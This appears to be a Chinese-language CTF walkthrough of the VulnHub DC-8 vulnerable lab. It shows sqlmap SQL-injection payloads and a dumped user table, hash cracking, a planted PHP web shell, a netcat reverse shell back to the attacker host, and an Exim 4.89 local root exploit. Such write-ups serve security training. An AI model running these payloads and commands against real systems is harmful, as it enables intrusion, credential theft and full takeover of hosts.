CTF-DC8靶机攻防
2020-03-02 本文已影响0人
xioooZorro
靶机下载地址
https://www.vulnhub.com/entry/dc-8,367/
靶机描述
DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
This challenge is a bit of a hybrid between being an actual challenge, and being a "proof of concept" as to whether two-factor authentication installed and configured on Linux can prevent the Linux server from being exploited.
The "proof of concept" portion of this challenge eventuated as a result of a question being asked about two-factor authentication and Linux on Twitter, and also due to a suggestion by @theart42.
The ultimate goal of this challenge is to bypass two-factor authentication, get root and to read the one and only flag.
You probably wouldn't even know that two-factor authentication was installed and configured unless you attempt to login via SSH, but it's definitely there and doing it's job.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
实验环境
- 攻击vps(kali linux):ip_addr 172.25.0.69
- DC8靶机:mac_addr 00:0c:29:01:84:ae
0x01 主机发现
通过arp抓包得到dc8靶机ip为172.25.0.72
kali@kali:~$ sudo netdiscover -i eth0 -r 172.25.0.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
9 Captured ARP Req/Rep packets, from 4 hosts. Total size: 540
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
172.25.0.1 00:50:56:c0:00:08 4 240 VMware, Inc.
172.25.0.2 00:50:56:f8:42:a0 2 120 VMware, Inc.
172.25.0.72 00:0c:29:01:84:ae 2 120 VMware, Inc.
172.25.0.100 00:50:56:e5:b3:42 1 60 VMware, Inc.
0x02 端口扫描
nmap扫描发现dc8靶机在22端口开启了ssh服务,80端口开启了http服务。
kali@kali:~$ sudo nmap -sV -O 172.25.0.72
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-01 19:44 EST
Nmap scan report for 172.25.0.72
Host is up (0.00021s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
80/tcp open http Apache httpd
MAC Address: 00:0C:29:01:84:AE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.11 seconds
0x03 漏洞发现
浏览器打开dc8-web网页
点击页面contact us,跳转发现该页面与后台数据库存在交互
手工检测发现存在数字型SQL注入
image.png
为了简化渗透过程,直接用sqlmap跑
C:\Users\Administrator\Desktop\burp\sqlmap-master>python sqlmap.py -u http://172.25.0.72/?nid=3 -D d7db -T users --columns -C "name,pass" --dump --thread 1000
___
__H__
___ ___[.]_____ ___ ___ {1.4.2.30#dev}
|_ -| . ["] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:40:19 /2020-03-02/
[10:40:20] [INFO] resuming back-end DBMS 'mysql'
[10:40:20] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: nid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nid=3 AND 1508=1508
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: nid=3 AND (SELECT 3742 FROM(SELECT COUNT(*),CONCAT(0x7170787671,(SELECT (ELT(3742=3742,1))),0x7178706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: nid=3 AND (SELECT 1530 FROM (SELECT(SLEEP(5)))BpDv)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: nid=-5850 UNION ALL SELECT CONCAT(0x7170787671,0x7a536a6f54587261797663525357484d506550475a465646787774544f675a6a506145646e687a7a,0x7178706271)-- -
---
[10:40:20] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[10:40:20] [INFO] fetching columns 'name, pass' for table 'users' in database 'd7db'
[10:40:20] [INFO] starting 2 threads
[10:40:20] [INFO] retrieved: 'pass','varchar(128)'
[10:40:20] [INFO] retrieved: 'name','varchar(60)'
Database: d7db
Table: users
[2 columns]
+--------+--------------+
| Column | Type |
+--------+--------------+
| name | varchar(60) |
| pass | varchar(128) |
+--------+--------------+
[10:40:20] [INFO] fetching entries of column(s) 'name, pass' for table 'users' in database 'd7db'
[10:40:20] [INFO] starting 3 threads
[10:40:21] [INFO] retrieved: '',''
[10:40:21] [INFO] retrieved: 'admin','$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihY...
[10:40:21] [INFO] retrieved: 'john','$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if...
Database: d7db
Table: users
[2 entries]
+-------+---------------------------------------------------------+
| name | pass |
+-------+---------------------------------------------------------+
| admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+-------+---------------------------------------------------------+
[10:40:21] [INFO] table 'd7db.users' dumped to CSV file 'C:\Users\Administrator\AppData\Local\sqlmap\output\172.25.0.72\dump\d7db\users.csv'
[10:40:21] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\172.25.0.72'
[*] ending @ 10:40:21 /2020-03-02/
使用john 来破解爆库得到的密文
vim dc8
admin:$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john:$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
john dc8
admin用户密码没破解成功,得到john密码如下:
turtle (john)
登录后台,发现该页面可编写php代码,在该页面写入php一句话木马,当用户点击concat us表单提交后,就会触发该php页面。
image.png
使用中国蚁剑连接
image.png
0x04 suid 提权
反弹shell
dc8:nc -e /bin/bash 172.25.0.69 7777
kali:nc -lvvp 7777
查找www-date用户具有suid执行权限的命令
发现疑似能利用suid提权的命令exim4(exim是一款邮件传输代理服务器软件)
由此猜测dc8靶机部署了邮件代理服务
www-data@dc-8:/tmp$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount
查看exim的版本,发现其为4.89版本。
www-data@dc-8:/tmp$ exim4 --version
exim4 --version
Exim version 4.89 #2 built 14-Jun-2017 05:03:07
Copyright (c) University of Cambridge, 1995 - 2017
(c) The Exim Maintainers and contributors in ACKNOWLEDGMENTS file, 2007 - 2017
Berkeley DB: Berkeley DB 5.3.28: (September 9, 2013)
Support for: crypteq iconv() IPv6 GnuTLS move_frozen_messages DKIM DNSSEC Event OCSP PRDR SOCKS TCP_Fast_Open
Lookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz dbmnz dnsdb dsearch nis nis0 passwd
Authenticators: cram_md5 plaintext
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile/maildir/mailstore autoreply lmtp pipe smtp
Fixed never_users: 0
Configure owner: 0:0
Size of off_t: 8
Configuration file is /var/lib/exim4/config.autogenerated
查看该exim版本存在的漏洞,发现该版本exim存在本地提权
kali@kali:~$ searchsploit exim
-------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------- ----------------------------------------
Dovecot with Exim - 'sender_address' Remote Command Execution | exploits/linux/remote/25297.txt
Exim - 'GHOST' glibc gethostbyname Buffer Overflow (Metasploit) | exploits/linux/remote/36421.rb
Exim - 'perl_startup' Local Privilege Escalation (Metasploit) | exploits/linux/local/39702.rb
Exim - 'sender_address' Remote Code Execution | exploits/linux/remote/25970.py
Exim 3.x - Format String | exploits/linux/local/20900.txt
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation | exploits/linux/local/40054.c
Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow | exploits/linux/local/756.c
Exim 4.41 - 'dns_build_reverse' Local Read Emails | exploits/linux/local/1009.c
Exim 4.42 - Local Privilege Escalation | exploits/linux/local/796.sh
Exim 4.43 - 'auth_spa_server()' Remote | exploits/linux/remote/812.c
Exim 4.63 - Remote Command Execution | exploits/linux/remote/15725.pl
Exim 4.84-3 - Local Privilege Escalation | exploits/linux/local/39535.sh
Exim 4.87 - 4.91 - Local Privilege Escalation | exploits/linux/local/46996.sh
Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit) | exploits/linux/local/47307.rb
Exim 4.87 < 4.91 - (Local / Remote) Command Execution | exploits/linux/remote/46974.txt
Exim 4.89 - 'BDAT' Denial of Service | exploits/multiple/dos/43184.txt
Exim < 4.86.2 - Local Privilege Escalation | exploits/linux/local/39549.txt
Exim < 4.90.1 - 'base64d' Remote Code Execution | exploits/linux/remote/44571.py
Exim Buffer 1.6.2/1.6.51 - Local Overflow | exploits/unix/local/20333.c
Exim ESMTP 4.80 - glibc gethostbyname Denial of Service | exploits/linux/dos/35951.py
Exim Internet Mailer 3.35/3.36/4.10 - Format String | exploits/linux/local/22066.c
Exim Sender 3.35 - Verification Remote Stack Buffer Overrun | exploits/linux/remote/24093.c
Exim4 < 4.69 - string_format Function Heap Buffer Overflow (Metasploit) | exploits/linux/remote/16925.rb
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution | exploits/php/webapps/42221.py
exim 4.90 - Remote Code Execution | exploits/linux/remote/45671.py
-------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
下载该漏洞提权exp并通过中国蚁剑上传到dc8的/tmp目录下
kali@kali:~$ searchsploit -m 46996.sh
Exploit: Exim 4.87 - 4.91 - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/46996
Path: /usr/share/exploitdb/exploits/linux/local/46996.sh
File Type: Bourne-Again shell script, ASCII text executable, with CRLF line terminators
cp: overwrite '/home/kali/46996.sh'?
Copied to: /home/kali/46996.sh
由于该提权脚本无法直接使用
需先使用 sed -i 's/\r$//' 46996.sh 命令来校正代码即可使用
kali@kali:~$ nc -lvvp 7777
listening on [any] 7777 ...
172.25.0.72: inverse host lookup failed: Unknown host
connect to [172.25.0.69] from (UNKNOWN) [172.25.0.72] 36168
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dc-8:/var/www/html$ cd /tmp
cd /tmp
www-data@dc-8:/tmp$ chmod +x 46996.sh
chmod +x 46996.sh
www-data@dc-8:/tmp$ ./46996.sh -m netcat
./46996.sh -m netcat
raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
Delivering netcat payload...
220 dc-8 ESMTP Exim 4.89 Mon, 02 Mar 2020 22:45:19 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1j8kRj-0000Hz-Px
221 dc-8 closing connection
Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open
cd /root
cd /root
ls
ls
flag.txt
cat flag.txt
cat flag.txt
Brilliant - you have succeeded!!!
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Hope you enjoyed DC-8. Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.
I'm also sending out an especially big thanks to:
@4nqr34z
@D4mianWayne
@0xmzfr
@theart42
This challenge was largely based on two things:
1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42
The answer to that question is...
If you enjoyed this CTF, send me a tweet via @DCAU7.
提权成功,并拿到flag,dc8 end!
